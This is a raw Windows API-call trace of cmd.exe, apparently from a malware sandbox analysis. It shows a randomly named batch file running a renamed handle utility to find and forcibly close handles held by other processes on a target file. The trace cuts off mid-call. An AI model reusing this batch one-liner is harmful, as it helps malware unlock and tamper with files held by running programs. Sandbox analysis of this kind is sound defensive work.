_Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x16eeb8 | out: _Buffer=">") returned 1 [0233.144] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.144] GetFileType (hFile=0x7) returned 0x2 [0233.145] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.145] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee80 | out: lpMode=0x16ee80) returned 1 [0233.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.145] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x16eeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x16eeac*=0x26) returned 1 [0233.145] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.145] GetFileType (hFile=0x7) returned 0x2 [0233.146] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.146] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f104 | out: lpMode=0x16f104) returned 1 [0233.146] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.146] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5f0dc0*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f130, lpReserved=0x0 | out: lpBuffer=0x5f0dc0*, lpNumberOfCharsWritten=0x16f130*=0x2) returned 1 [0233.147] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f13c | out: _Buffer=" /d \"C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\\" ") returned 45 [0233.147] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.147] GetFileType (hFile=0x7) returned 0x2 [0233.147] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.147] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0233.148] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.148] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2d, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x2d) returned 1 [0233.149] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f15c | out: _Buffer="\r\n") returned 2 [0233.149] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.149] GetFileType (hFile=0x7) returned 0x2 [0233.149] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.149] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f11c | out: lpMode=0x16f11c) returned 1 [0233.150] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.150] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f148*=0x2) returned 1 [0233.151] _wcsicmp (_String1="cd", _String2="DIR") returned -1 [0233.151] _wcsicmp (_String1="cd", _String2="ERASE") returned -2 [0233.151] _wcsicmp (_String1="cd", _String2="DEL") returned -1 [0233.151] _wcsicmp (_String1="cd", _String2="TYPE") returned -17 [0233.151] _wcsicmp (_String1="cd", _String2="COPY") returned -11 [0233.151] _wcsicmp (_String1="cd", _String2="CD") returned 0 [0233.151] GetConsoleTitleW (in: lpConsoleTitle=0x16eccc, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0233.152] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0233.152] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0233.153] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x16ea88, nVolumeNameSize=0x104, lpVolumeSerialNumber=0x16ea80, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0x16ea80*=0x9c354b42, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0233.153] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x16e824 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0233.153] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", nBufferLength=0x104, lpBuffer=0x16e824, lpFilePart=0x16e820 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\", lpFilePart=0x16e820*=0x0) returned 0x26 [0233.154] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0233.154] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x16e5a0 | out: lpFindFileData=0x16e5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfda01e06, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Users", cAlternateFileName="")) returned 0x606430 [0233.154] FindClose (in: hFindFile=0x606430 | out: hFindFile=0x606430) returned 1 [0233.154] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz", lpFindFileData=0x16e5a0 | out: lpFindFileData=0x16e5a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28c670c0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x2b8829a0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x2b8829a0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="5p5NrGJn0jS HALPmcxz", cAlternateFileName="5P5NRG~1")) returned 0x606430 [0233.154] FindClose (in: hFindFile=0x606430 | out: hFindFile=0x606430) returned 1 [0233.154] _wcsnicmp (_String1="5P5NRG~1", _String2="5p5NrGJn0jS HALPmcxz", _MaxCount=0x14) returned 20 [0233.154] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop", lpFindFileData=0x16e5a0 | out: lpFindFileData=0x16e5a0*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x444bc0, ftLastAccessTime.dwHighDateTime=0x1d68287, ftLastWriteTime.dwLowDateTime=0x444bc0, ftLastWriteTime.dwHighDateTime=0x1d68287, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Desktop", cAlternateFileName="")) returned 0x606430 [0233.154] FindClose (in: hFindFile=0x606430 | out: hFindFile=0x606430) returned 1 [0233.154] GetFileAttributesW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 0x11 [0233.154] SetCurrentDirectoryW (lpPathName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop")) returned 1 [0233.154] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 1 [0233.154] GetProcessHeap () returned 0x5f0000 [0233.154] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x609650 | out: hHeap=0x5f0000) returned 1 [0233.154] GetEnvironmentStringsW () returned 0x608ac0* [0233.154] GetProcessHeap () returned 0x5f0000 [0233.154] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xb84) returned 0x609650 [0233.155] FreeEnvironmentStringsW (penv=0x608ac0) returned 1 [0233.155] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0233.155] GetProcessHeap () returned 0x5f0000 [0233.155] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6063d0 | out: hHeap=0x5f0000) returned 1 [0233.155] GetProcessHeap () returned 0x5f0000 [0233.155] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606370 | out: hHeap=0x5f0000) returned 1 [0233.155] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.155] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0233.156] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.156] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49dc41ac | out: lpMode=0x49dc41ac) returned 1 [0233.156] _get_osfhandle (_FileHandle=0) returned 0x3 [0233.156] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49dc41b0 | out: lpMode=0x49dc41b0) returned 1 [0233.156] SetConsoleInputExeNameW () returned 0x1 [0233.156] GetConsoleOutputCP () returned 0x1b5 [0233.157] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49dc4260 | out: lpCPInfo=0x49dc4260) returned 1 [0233.157] SetThreadUILanguage (LangId=0x0) returned 0x409 [0233.157] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\Ch81ANBE.bat" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\ch81anbe.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x16f104, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x78 [0233.158] _open_osfhandle (_OSFileHandle=0x78, _Flags=8) returned 3 [0233.158] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.158] SetFilePointer (in: hFile=0x78, lDistanceToMove=78, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0233.158] GetProcessHeap () returned 0x5f0000 [0233.158] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606300 | out: hHeap=0x5f0000) returned 1 [0233.158] GetProcessHeap () returned 0x5f0000 [0233.158] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606290 | out: hHeap=0x5f0000) returned 1 [0233.158] GetProcessHeap () returned 0x5f0000 [0233.158] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606220 | out: hHeap=0x5f0000) returned 1 [0233.158] GetProcessHeap () returned 0x5f0000 [0233.158] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6061b0 | out: hHeap=0x5f0000) returned 1 [0233.158] GetProcessHeap () returned 0x5f0000 [0233.158] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0db8 | out: hHeap=0x5f0000) returned 1 [0233.158] GetProcessHeap () returned 0x5f0000 [0233.158] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x606150 | out: hHeap=0x5f0000) returned 1 [0233.158] GetProcessHeap () returned 0x5f0000 [0233.158] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x6060f0 | out: hHeap=0x5f0000) returned 1 [0233.158] GetProcessHeap () returned 0x5f0000 [0233.158] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f1240 | out: hHeap=0x5f0000) returned 1 [0233.158] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.158] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x4e [0233.159] ReadFile (in: hFile=0x78, lpBuffer=0x49dc6640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x16f0e8, lpOverlapped=0x0 | out: lpBuffer=0x49dc6640*, lpNumberOfBytesRead=0x16f0e8*=0x94, lpOverlapped=0x0) returned 1 [0233.159] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49dc6640, cbMultiByte=148, lpWideCharStr=0x49dcc640, cchWideChar=8191 | out: lpWideCharStr="FOR /F \"UseBackQ Tokens=3,6 delims=: \" %%I IN (`tdq963ii.exe -accepteula %FN% -nobanner`) DO (tdq963ii.exe -accepteula -c %%J -y -p %%I -nobanner)\r\n") returned 148 [0233.159] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.159] GetFileType (hFile=0x78) returned 0x1 [0233.159] _get_osfhandle (_FileHandle=3) returned 0x78 [0233.159] SetFilePointer (in: hFile=0x78, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xe2 [0233.159] GetProcessHeap () returned 0x5f0000 [0233.159] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x400a) returned 0x614aa8 [0233.159] GetProcessHeap () returned 0x5f0000 [0233.159] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x4008) returned 0x618ac0 [0233.160] GetProcessHeap () returned 0x5f0000 [0233.160] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe) returned 0x5f0db8 [0233.160] GetEnvironmentVariableW (in: lpName="FN", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="\"jnwmon.dll.mui\"") returned 0x10 [0233.160] GetProcessHeap () returned 0x5f0000 [0233.160] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0db8 | out: hHeap=0x5f0000) returned 1 [0233.160] GetProcessHeap () returned 0x5f0000 [0233.160] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x618ac0 | out: hHeap=0x5f0000) returned 1 [0233.160] GetProcessHeap () returned 0x5f0000 [0233.160] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x614aa8 | out: hHeap=0x5f0000) returned 1 [0233.167] _tell (_FileHandle=3) returned 226 [0233.167] _close (_FileHandle=3) returned 0 [0233.167] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16eebc | out: _Buffer="\r\n") returned 2 [0233.167] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.167] GetFileType (hFile=0x7) returned 0x2 [0233.506] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.506] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee7c | out: lpMode=0x16ee7c) returned 1 [0233.506] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.506] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16eea8, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16eea8*=0x2) returned 1 [0233.508] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49dd0640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0233.508] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49dc5260 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 0x25 [0233.508] _vsnwprintf (in: _Buffer=0x49dc5e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x16eeb8 | out: _Buffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 37 [0233.508] _vsnwprintf (in: _Buffer=0x49dc5e8a, _BufferCount=0x3d9, _Format="%c", _ArgList=0x16eeb8 | out: _Buffer=">") returned 1 [0233.508] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.508] GetFileType (hFile=0x7) returned 0x2 [0233.508] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.508] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16ee80 | out: lpMode=0x16ee80) returned 1 [0233.509] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.509] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dc5e40*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x16eeac, lpReserved=0x0 | out: lpBuffer=0x49dc5e40*, lpNumberOfCharsWritten=0x16eeac*=0x26) returned 1 [0233.509] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%.3s", _ArgList=0x16f13c | out: _Buffer="FOR") returned 3 [0233.509] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.509] GetFileType (hFile=0x7) returned 0x2 [0233.510] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.510] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0233.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.510] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x3) returned 1 [0233.510] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x16f13c | out: _Buffer=" /F") returned 3 [0233.510] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.510] GetFileType (hFile=0x7) returned 0x2 [0233.511] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.511] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0233.511] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.511] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x3) returned 1 [0233.511] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s", _ArgList=0x16f13c | out: _Buffer=" \"UseBackQ Tokens=3,6 delims=: \"") returned 32 [0233.511] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.511] GetFileType (hFile=0x7) returned 0x2 [0233.512] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.512] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0233.512] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.512] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x20, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x20) returned 1 [0233.512] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format=" %s ", _ArgList=0x16f13c | out: _Buffer=" %I IN ") returned 7 [0233.512] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.512] GetFileType (hFile=0x7) returned 0x2 [0233.513] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.513] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0233.513] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.513] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x7) returned 1 [0233.514] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="(%s) %s ", _ArgList=0x16f138 | out: _Buffer="(`tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner`) DO ") returned 59 [0233.514] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.514] GetFileType (hFile=0x7) returned 0x2 [0233.515] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.515] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0f8 | out: lpMode=0x16f0f8) returned 1 [0233.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.515] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x3b, lpNumberOfCharsWritten=0x16f124, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f124*=0x3b) returned 1 [0233.515] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.515] GetFileType (hFile=0x7) returned 0x2 [0233.516] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.516] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f104 | out: lpMode=0x16f104) returned 1 [0233.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.516] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dbbd04*, nNumberOfCharsToWrite=0x1, lpNumberOfCharsWritten=0x16f130, lpReserved=0x0 | out: lpBuffer=0x49dbbd04*, lpNumberOfCharsWritten=0x16f130*=0x1) returned 1 [0233.516] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.516] GetFileType (hFile=0x7) returned 0x2 [0233.517] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.517] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0e8 | out: lpMode=0x16f0e8) returned 1 [0233.517] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.517] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x5ff4e0*, nNumberOfCharsToWrite=0xc, lpNumberOfCharsWritten=0x16f114, lpReserved=0x0 | out: lpBuffer=0x5ff4e0*, lpNumberOfCharsWritten=0x16f114*=0xc) returned 1 [0233.517] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f120 | out: _Buffer=" -accepteula -c %J -y -p %I -nobanner ") returned 38 [0233.517] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.517] GetFileType (hFile=0x7) returned 0x2 [0233.518] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.518] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0e0 | out: lpMode=0x16f0e0) returned 1 [0233.518] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.518] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x26, lpNumberOfCharsWritten=0x16f10c, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f10c*=0x26) returned 1 [0233.519] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x16f13c | out: _Buffer=") ") returned 2 [0233.519] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.519] GetFileType (hFile=0x7) returned 0x2 [0233.520] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.520] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f0fc | out: lpMode=0x16f0fc) returned 1 [0233.520] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.520] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f128, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f128*=0x2) returned 1 [0233.520] _vsnwprintf (in: _Buffer=0x49dd4640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x16f15c | out: _Buffer="\r\n") returned 2 [0233.520] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.520] GetFileType (hFile=0x7) returned 0x2 [0233.521] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0233.521] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x16f11c | out: lpMode=0x16f11c) returned 1 [0233.521] _get_osfhandle (_FileHandle=1) returned 0x7 [0233.521] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49dd4640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x16f148, lpReserved=0x0 | out: lpBuffer=0x49dd4640*, lpNumberOfCharsWritten=0x16f148*=0x2) returned 1 [0233.522] GetProcessHeap () returned 0x5f0000 [0233.522] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x2c) returned 0x6055e0 [0233.522] GetProcessHeap () returned 0x5f0000 [0233.522] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xc) returned 0x5f0db8 [0233.522] GetProcessHeap () returned 0x5f0000 [0233.522] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xc) returned 0x5f0dd0 [0233.522] GetProcessHeap () returned 0x5f0000 [0233.522] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe) returned 0x5f0de8 [0233.523] _wcsnicmp (_String1="UseBackQ", _String2="usebackq", _MaxCount=0x8) returned 0 [0233.523] _wcsnicmp (_String1="Tokens=3", _String2="usebackq", _MaxCount=0x8) returned -1 [0233.523] _wcsnicmp (_String1="Tokens=", _String2="useback", _MaxCount=0x7) returned -1 [0233.523] _wcsnicmp (_String1="Toke", _String2="eol=", _MaxCount=0x4) returned 15 [0233.523] _wcsnicmp (_String1="Tokens=", _String2="delims=", _MaxCount=0x7) returned 16 [0233.523] _wcsnicmp (_String1="Token", _String2="skip=", _MaxCount=0x5) returned 1 [0233.523] _wcsnicmp (_String1="Tokens=", _String2="tokens=", _MaxCount=0x7) returned 0 [0233.523] wcstol (in: _String="3,6 delims=: \"", _EndPtr=0x16f078, _Radix=0 | out: _EndPtr=0x16f078*=",6 delims=: \"") returned 3 [0233.523] wcstol (in: _String="6 delims=: \"", _EndPtr=0x16f078, _Radix=0 | out: _EndPtr=0x16f078*=" delims=: \"") returned 6 [0233.523] _wcsnicmp (_String1="delims=:", _String2="usebackq", _MaxCount=0x8) returned -17 [0233.523] _wcsnicmp (_String1="delims=", _String2="useback", _MaxCount=0x7) returned -17 [0233.523] _wcsnicmp (_String1="deli", _String2="eol=", _MaxCount=0x4) returned -1 [0233.523] _wcsnicmp (_String1="delims=", _String2="delims=", _MaxCount=0x7) returned 0 [0233.523] GetProcessHeap () returned 0x5f0000 [0233.523] HeapFree (in: hHeap=0x5f0000, dwFlags=0x0, lpMem=0x5f0de8 | out: hHeap=0x5f0000) returned 1 [0233.523] GetProcessHeap () returned 0x5f0000 [0233.523] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0xe) returned 0x5f0de8 [0233.523] GetProcessHeap () returned 0x5f0000 [0233.523] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f0db8, Size=0xe) returned 0x5f0e00 [0233.523] GetProcessHeap () returned 0x5f0000 [0233.523] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x5f0e00) returned 0xe [0233.523] GetProcessHeap () returned 0x5f0000 [0233.523] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x5f0dd0, Size=0x14) returned 0x606338 [0233.523] GetProcessHeap () returned 0x5f0000 [0233.523] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x606338) returned 0x14 [0233.524] _wpopen (_Command="tdq963ii.exe -accepteula \"jnwmon.dll.mui\" -nobanner", _Mode="rb") returned 0x77032960 [0233.545] feof (_File=0x77032960) returned 0 [0233.545] ferror (_File=0x77032960) returned 0 [0233.545] GetProcessHeap () returned 0x5f0000 [0233.546] RtlAllocateHeap (HeapHandle=0x5f0000, Flags=0x8, Size=0x108) returned 0x606358 [0233.546] fgets (in: _Buf=0x606360, _MaxCount=256, _File=0x77032960 | out: _Buf="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n", _File=0x77032960) returned="Unable to extract x64 image. Run Handle from a writeable directory.\r\r\n" [0237.983] feof (_File=0x77032960) returned 0 [0237.983] ferror (_File=0x77032960) returned 0 [0237.983] GetProcessHeap () returned 0x5f0000 [0237.984] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x606358, Size=0x208) returned 0x606358 [0237.984] GetProcessHeap () returned 0x5f0000 [0237.984] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x606358) returned 0x208 [0237.984] fgets (in: _Buf=0x6063a6, _MaxCount=442, _File=0x77032960 | out: _Buf="\r\r\n", _File=0x77032960) returned="\r\r\n" [0237.984] feof (_File=0x77032960) returned 0 [0237.984] ferror (_File=0x77032960) returned 0 [0237.984] GetProcessHeap () returned 0x5f0000 [0237.984] RtlReAllocateHeap (Heap=0x5f0000, Flags=0x0, Ptr=0x606358, Size=0x308) returned 0x606358 [0237.984] GetProcessHeap () returned 0x5f0000 [0237.984] RtlSizeHeap (HeapHandle=0x5f0000, Flags=0x0, MemoryPointer=0x606358) returned 0x308 [0237.984] fgets (in: _Buf=0x6063a9, 